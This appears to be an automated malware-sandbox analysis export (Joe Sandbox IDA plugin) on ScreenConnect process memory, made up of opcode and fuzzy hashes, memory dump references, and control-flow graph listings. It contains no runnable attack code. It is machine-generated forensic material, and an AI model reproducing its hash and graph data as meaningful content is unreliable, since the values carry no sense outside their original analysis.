                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 8cc805633cf34e692263cf6b54f13eb5300c5be5fd601b5b370d2d910a99475a
                                                                                                                                                                                                                                                  • Instruction ID: 80f3e62de440f727c4f8ceadd5ad781bd31b5f894f7781670d758585cb9d9ecb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8cc805633cf34e692263cf6b54f13eb5300c5be5fd601b5b370d2d910a99475a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7E09234A05650AFC7355F20E02C65DBFF6FF4B2157554095E80A8B245CF36A855CF81
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 441e888bd6f62aba161139c4c526efef71888febe1721307c2e3ffae90dfb498
                                                                                                                                                                                                                                                  • Instruction ID: b15d5162cdf61a1de6924a6c361980fc1310d5c1cf48043af44d7533ea3d5e9d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 441e888bd6f62aba161139c4c526efef71888febe1721307c2e3ffae90dfb498
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51E08C3A3001146B8364AE7DF40C46E7BEAEFD92723108536E906C3398CE708C52C7A0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: d29b27dc0491a8af42a6de7a49432255861425ec5bc6ac661ea601429acdd268
                                                                                                                                                                                                                                                  • Instruction ID: 49eac010b469f957dc832c9898e8e32f796aa8f75de79fc4cba801069ffaaa0d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d29b27dc0491a8af42a6de7a49432255861425ec5bc6ac661ea601429acdd268
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B5E086B0C0010DAF8780DFBCC90566DBFF4EF09204B1085EAC85DE7241EA3289028BC1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: e877502803fe4c2375840c2d587d2ea5900e518eb6fff263242cd63ce48a3670
                                                                                                                                                                                                                                                  • Instruction ID: 3d89d01d1c4e600039fb4610c56f7548686f91adab8a010f36b2f7814355f0cf
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e877502803fe4c2375840c2d587d2ea5900e518eb6fff263242cd63ce48a3670
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 36E0D8311087924FC716DB2CF4402DCBFE1EF962207054AEDD1808B266CB60B9498394
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 65e4b696c279c52f1dcc7dd6a479f2be8ae2fe36df40ab47bbf066542f8032ab
                                                                                                                                                                                                                                                  • Instruction ID: 3270b51eafc31600112a793624ceb35f63e4316312086bc548e77407287a63e8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 65e4b696c279c52f1dcc7dd6a479f2be8ae2fe36df40ab47bbf066542f8032ab
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18E0263008D3C11FC3028B74A8966D57FE4CF47624F4908D9E5C58F143D126645BCBA3
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 38b6f9126abd603b1b7089aab725e6144d7aee1b99e46b95133af580ccd25813
                                                                                                                                                                                                                                                  • Instruction ID: 40b23b33afd8441d977b71ead765ec14be3c68388bcf9bb659751b76a91ea6e9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 38b6f9126abd603b1b7089aab725e6144d7aee1b99e46b95133af580ccd25813
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6EE0EC744087459FC7519F24E584448BFF0BF0A614F0644DED8C8C7241E731A989DB52
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 1fc9e2ab3997497ad834ed878b5c32322fa22e2dc5ea7d86da6400677be1306e
                                                                                                                                                                                                                                                  • Instruction ID: e14188b72c1f984577bab3ca615f72e2714a02098fa8eb448bcb90c2c0dc812d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1fc9e2ab3997497ad834ed878b5c32322fa22e2dc5ea7d86da6400677be1306e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 43D01730A1120CFF8B00EFA8E90059DBBF9EB44210B2042A8D408D7244EA31AF049B80
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2133542953.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 002262bca67d2bedd4448879ebf168aaa814cefde7dc036ca588e711e2c2894d
                                                                                                                                                                                                                                                  • Instruction ID: 3b0905d6e3affc8cd507772b78f848520a5796f43525f4a501cafda22817a8ed
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 002262bca67d2bedd4448879ebf168aaa814cefde7dc036ca588e711e2c2894d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ADD05B7094124CEFCB40DFB5E91155DB7F9EB54210B1085B9D808D3308DB315F449B80

                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                  Execution Coverage:8%
                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                                  Total number of Nodes:2
                                                                                                                                                                                                                                                  Total number of Limit Nodes:0
                                                                                                                                                                                                                                                  execution_graph 28787 429feb0 CloseHandle 28788 429ff1a 28787->28788

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 258 1b1c67f-1b1c684 259 1b1c6e4 258->259 260 1b1c686-1b1c69c 258->260 262 1b1c6fc-1b1c713 260->262 263 1b1c69e-1b1c6b1 260->263 268 1b1c714-1b1c726 262->268 266 1b1c6b3-1b1c6b4 263->266 267 1b1c6f2-1b1c6fb 263->267 266->268 269 1b1c6b6-1b1c6df 266->269 267->262 270 1b1ca57-1b1ca5e 268->270 271 1b1c72c-1b1c744 268->271 269->259 276 1b1c766-1b1c781 271->276 277 1b1c746-1b1c761 271->277 337 1b1c786 call 1b1cbb0 276->337 338 1b1c786 call 1b1cbc0 276->338 282 1b1c80e-1b1c823 call 1b1f950 277->282 285 1b1c829-1b1c83f call 1b15c2c 282->285 286 1b1ca2b-1b1ca3e 282->286 283 1b1c78c-1b1c7d4 333 1b1c7d7 call 1b1ecb1 283->333 334 1b1c7d7 call 1b1ecc0 283->334 335 1b1c7d7 call 1b1ed38 283->335 336 1b1c7d7 call 1b1ed28 283->336 294 1b1c841-1b1c847 285->294 295 1b1c857-1b1c880 285->295 289 1b1ca45-1b1ca49 286->289 292 1b1ca54-1b1ca55 289->292 293 1b1ca4b 289->293 292->270 293->292 297 1b1c849 294->297 298 1b1c84b-1b1c84d 294->298 295->286 304 1b1c886-1b1c88c 295->304 296 1b1c7da-1b1c800 305 1b1c802 296->305 306 1b1c80b 296->306 297->295 298->295 307 1b1ca40 304->307 308 1b1c892-1b1c8a9 304->308 305->306 306->282 307->289 308->307 310 1b1c8af-1b1c8d3 308->310 313 1b1c8d9-1b1c972 call 1b1aab0 call 1b1b5a8 310->313 314 1b1ca1e-1b1ca25 310->314 313->286 321 1b1c978-1b1c986 313->321 314->286 314->304 323 1b1c9b1-1b1c9d9 call 1b1fa08 321->323 324 1b1c988-1b1c9ac 321->324 328 1b1c9e0-1b1ca1c call 1b15c3c 323->328 324->289 328->289 333->296 334->296 335->296 336->296 337->283 338->283
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: $kq$$kq
                                                                                                                                                                                                                                                  • API String ID: 0-3550614674
                                                                                                                                                                                                                                                  • Opcode ID: 7a1f4c4cbd337ca3f0771d602c37f27d0b1470d61ed97cb3cc0ce6157c44b0dc
                                                                                                                                                                                                                                                  • Instruction ID: f7bb658bcda95ea8318e8cefa60816f45f704467ddd8dd0c0aabfdb7f7298784
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7a1f4c4cbd337ca3f0771d602c37f27d0b1470d61ed97cb3cc0ce6157c44b0dc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 81B1D430A50349CFDB19EFA8C4946ADBFB1FF85300F5186A9D405AB369DB74AD85CB80

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 586 1b1ef78-1b1ef97 587 1b1f1c8-1b1f1ed 586->587 588 1b1ef9d-1b1efa6 586->588 591 1b1f1f4-1b1f233 587->591 588->591 592 1b1efac-1b1f010 588->592 603 1b1f012-1b1f037 592->603 604 1b1f03a-1b1f043 592->604 603->604 605 1b1f045 604->605 606 1b1f048-1b1f05e call 1b1f630 604->606 605->606 609 1b1f064-1b1f066 606->609 611 1b1f0c3-1b1f0d0 609->611 612 1b1f068-1b1f06d 609->612 617 1b1f0d2-1b1f0db 611->617 618 1b1f0dd 611->618 613 1b1f0a9-1b1f0bc 612->613 614 1b1f06f-1b1f0a4 612->614 613->611 625 1b1f168-1b1f17c 614->625 620 1b1f0e2-1b1f0e4 617->620 618->620 623 1b1f0e6-1b1f112 620->623 624 1b1f119-1b1f161 620->624 623->624 624->625 630 1b1f186-1b1f18b 625->630 631 1b1f17e 625->631 633 1b1f195-1b1f19a 630->633 634 1b1f18d 630->634 631->630 635 1b1f19c-1b1f1aa call 1b1e9f4 call 1b1ea0c 633->635 636 1b1f1af 633->636 634->633 635->636 636->587
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: (&kq$(oq
                                                                                                                                                                                                                                                  • API String ID: 0-2620321033
                                                                                                                                                                                                                                                  • Opcode ID: 03bc86c37f46bcd27803b5803af1f4abcf05d43c295d9508fef5e266cfc7fab5
                                                                                                                                                                                                                                                  • Instruction ID: 10a82cd6a2526f9d1784ff9eae946c25d467c6cfe3b7bd9aa631302a65b6bc13
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 03bc86c37f46bcd27803b5803af1f4abcf05d43c295d9508fef5e266cfc7fab5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9761A231F002198BEB19EFB9C4506AE7AA2EFC8700F65856DD402BB388DF34AD45C795

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 648 1b14c62-1b14cb3 653 1b14d02-1b14d08 648->653 654 1b14cb5-1b14cc4 call 1b14848 648->654 657 1b14cc6-1b14ccb 654->657 658 1b14d09-1b14dd8 654->658 671 1b14cce call 1b152f8 657->671 672 1b14cce call 1b152e8 657->672 664 1b14de1-1b14e24 658->664 665 1b14dda-1b14de0 658->665 659 1b14cd4 659->653 669 1b14e26 664->669 670 1b14e2b-1b14e32 664->670 665->664 669->670 671->659 672->659
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: `Qkq$`Qkq
                                                                                                                                                                                                                                                  • API String ID: 0-2839243183
                                                                                                                                                                                                                                                  • Opcode ID: 8d8a92234f4782d6eab428b7898d1036d45c4bb8dde12b8f40406e7561e0a122
                                                                                                                                                                                                                                                  • Instruction ID: 2e105fd6dbb1fee165e9fd1bed0245c34c8a018e8b8836493d8a9fd745b5cd2b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d8a92234f4782d6eab428b7898d1036d45c4bb8dde12b8f40406e7561e0a122
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E841CD31A003199FDB64DF68D804BAEBBB5FB45300F4081E9D509A7294DB745D49CF92

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 673 1b15410-1b1541b 674 1b15421-1b15423 673->674 675 1b15425-1b1542b 674->675 676 1b1543b-1b1543c 674->676 677 1b1542d 675->677 678 1b1542f-1b15431 675->678 677->676 678->676
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: $kq$$kq
                                                                                                                                                                                                                                                  • API String ID: 0-3550614674
                                                                                                                                                                                                                                                  • Opcode ID: 822d3a454451adbc36a821ffa39bc6362745286aec996108d016322253d37e5b
                                                                                                                                                                                                                                                  • Instruction ID: 2c1c48466b271fed7660d830c9c6d39f70186360385a2ed35b2afedb4b028a81
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 822d3a454451adbc36a821ffa39bc6362745286aec996108d016322253d37e5b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7DD05E303902188F967CDE29E540A1233E9BB856013A205E9D6098B37ECB35EC41C751

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 679 1b1fb40-1b1fb87 call 1b17390 * 2 684 1b1fb89-1b1fbb4 679->684 685 1b1fbba-1b1fbbe 679->685 684->685 686 1b1fbf1-1b1fbf5 685->686 687 1b1fbc0-1b1fbeb 685->687 688 1b1fbf7-1b1fc05 686->688 689 1b1fc0b-1b1fc0f 686->689 687->686 688->689 692 1b1fc11-1b1fc35 689->692 693 1b1fc3b-1b1fccd 689->693 692->693 698 1b1fd02-1b1fd06 693->698 699 1b1fccf-1b1fcfc 693->699 700 1b1fd22-1b1fd26 698->700 701 1b1fd08-1b1fd1c 698->701 699->698 704 1b1fd42-1b1fd46 700->704 705 1b1fd28-1b1fd3c 700->705 701->700 706 1b1fd62-1b1fd66 704->706 707 1b1fd48-1b1fd5c 704->707 705->704 710 1b1fd68-1b1fd76 706->710 711 1b1fd7c-1b1fd80 706->711 707->706 710->711 713 1b1fd82-1b1fd90 711->713 714 1b1fd96-1b1fd9a 711->714 713->714 715 1b1fdb0-1b1fdb4 714->715 716 1b1fd9c-1b1fdaa 714->716 717 1b1fdb6-1b1fdc4 715->717 718 1b1fdca-1b1fdce 715->718 716->715 717->718 719 1b1fe01-1b1fe05 718->719 720 1b1fdd0-1b1fdfb 718->720 721 1b1fe51-1b1fe58 719->721 722 1b1fe07-1b1fe15 719->722 720->719 722->721 724 1b1fe17 722->724 725 1b1fe1a-1b1fe1f 724->725 727 1b1fe21-1b1fe32 725->727 728 1b1fe59-1b1fed9 call 1b174f8 725->728 729 1b1fe34-1b1fe37 727->729 730 1b1fe3d-1b1fe4f 727->730 741 1b1fedb-1b1fef1 728->741 742 1b1ff1c-1b1ff1d 728->742 729->730 730->721 730->725 745 1b1fef3 741->745 746 1b1fefa-1b1ff1a 741->746 743 1b1ff28-1b1ff2d 742->743 745->746 746->742
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: d
                                                                                                                                                                                                                                                  • API String ID: 0-2564639436
                                                                                                                                                                                                                                                  • Opcode ID: 277025bbd67b4295e0d822957d1ee75f0434c1c27bed87224e216c440465a8ba
                                                                                                                                                                                                                                                  • Instruction ID: 72222df1fdfeeeaff439c92f6ed978da0c86a7b2cd617f034b6fed7e0de88f10
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 277025bbd67b4295e0d822957d1ee75f0434c1c27bed87224e216c440465a8ba
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D2D18375A40705CFCB49DF68C884A99BBB6FF49310B518699E909AB365DB30FC85CF80

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 904 1b18d98-1b18db8 905 1b18de2-1b18df1 904->905 906 1b18dba-1b18ddb 904->906 907 1b18df3 905->907 908 1b18dfd-1b18e0a 905->908 906->905 907->908 911 1b18e10-1b18e1f 908->911 912 1b18ede-1b18ef2 908->912 914 1b18e21 911->914 915 1b18e2b-1b18e37 911->915 916 1b18ef4 912->916 917 1b18efe-1b18f21 912->917 914->915 921 1b18e70-1b18e7f 915->921 922 1b18e39-1b18e48 915->922 916->917 928 1b18f23 917->928 929 1b18f2d-1b18f37 917->929 926 1b18e81 921->926 927 1b18e8b-1b18eb2 921->927 924 1b18e54-1b18e6f 922->924 925 1b18e4a 922->925 925->924 926->927 935 1b18eb4 927->935 936 1b18ebe-1b18edd 927->936 928->929 949 1b18f3a call 1b190a8 929->949 950 1b18f3a call 1b19098 929->950 935->936 937 1b18f40-1b18f42 938 1b18f44-1b18f53 937->938 939 1b18f88-1b18fa1 937->939 942 1b18f55 938->942 943 1b18f5f-1b18f86 938->943 944 1b18fa3 939->944 945 1b18fac 939->945 942->943 943->938 943->939 944->945 949->937 950->937
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: (oq
                                                                                                                                                                                                                                                  • API String ID: 0-3175707579
                                                                                                                                                                                                                                                  • Opcode ID: 1dcde31ce2208eeea5ab03d9964557673b2dd8c2282537e5d7ea9e09466759a6
                                                                                                                                                                                                                                                  • Instruction ID: 4c363157f0a2ac3447762167e320660bf047ef2257f8f8fb7ffcaea40621f68b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1dcde31ce2208eeea5ab03d9964557673b2dd8c2282537e5d7ea9e09466759a6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E361F734B106058FDB14DF69E99495EB7F2FF8D315B5281A8E506AB369DB30EC01DB80
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: LRkq
                                                                                                                                                                                                                                                  • API String ID: 0-1052062081
                                                                                                                                                                                                                                                  • Opcode ID: d79ddfbf9d7ca2214be8818c514dce042ab0782fadb577a8455d804b5391a608
                                                                                                                                                                                                                                                  • Instruction ID: 6fdd6bc18b2f1abc58e2d42591c6ad810c932c4dc4e06c0d43e972709fa1f91a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d79ddfbf9d7ca2214be8818c514dce042ab0782fadb577a8455d804b5391a608
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5451E230A022919FDB299B78D95476FBBE2FF84301F15C5AED446DB299DB30AC85C780
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: $kq
                                                                                                                                                                                                                                                  • API String ID: 0-3037731980
                                                                                                                                                                                                                                                  • Opcode ID: fdf6077a7493d73c3360539a6ba886c806bbde5dce1b9d0a1a3a8553e879bc73
                                                                                                                                                                                                                                                  • Instruction ID: f2193f931c19f5b80dcd44a23cd4345f27466e3c11c6c53697456dd554823d27
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fdf6077a7493d73c3360539a6ba886c806bbde5dce1b9d0a1a3a8553e879bc73
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B518230A50319CFDB19EFA8C55866DBBB2FF45300F1186A9D406AB369DB74DC85CB80
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: (oq
                                                                                                                                                                                                                                                  • API String ID: 0-3175707579
                                                                                                                                                                                                                                                  • Opcode ID: 315a42b5f84813863ca5ee8b9cb2d83deb6a1fad0015d89c10326b55f58e54bb
                                                                                                                                                                                                                                                  • Instruction ID: 8ac14c9ac78302a1d391254491482ce3d89a0aa9daa3bdc1453ba9d7812e4914
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 315a42b5f84813863ca5ee8b9cb2d83deb6a1fad0015d89c10326b55f58e54bb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F741C231B00505CFDB29EF68D894A6EBBB6EF84300F15C5A9E9059B359DF34E806CB90
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: (
                                                                                                                                                                                                                                                  • API String ID: 0-1334834377
                                                                                                                                                                                                                                                  • Opcode ID: 9c7319dd5346230da4d30c7f8b5271fbe537a35f10cf2d2260b802cd21433376
                                                                                                                                                                                                                                                  • Instruction ID: 736a105dc06b4cb18f6ff75514c313b1e9e8e66fc6237da064a4f75bf86a629f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9c7319dd5346230da4d30c7f8b5271fbe537a35f10cf2d2260b802cd21433376
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D5319031B502115F9709EB7DA84455FB7E6EBC82103518A68D916EB348EF70ED05CBE4
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: (
                                                                                                                                                                                                                                                  • API String ID: 0-1334834377
                                                                                                                                                                                                                                                  • Opcode ID: e35c64e1be66612e406871142daebf4435cfc092b8ad69d39908e109a503905e
                                                                                                                                                                                                                                                  • Instruction ID: 43b32bf1c7f80560607de85c41e4bd905439d6a9426c33c2e9745083ad632d15
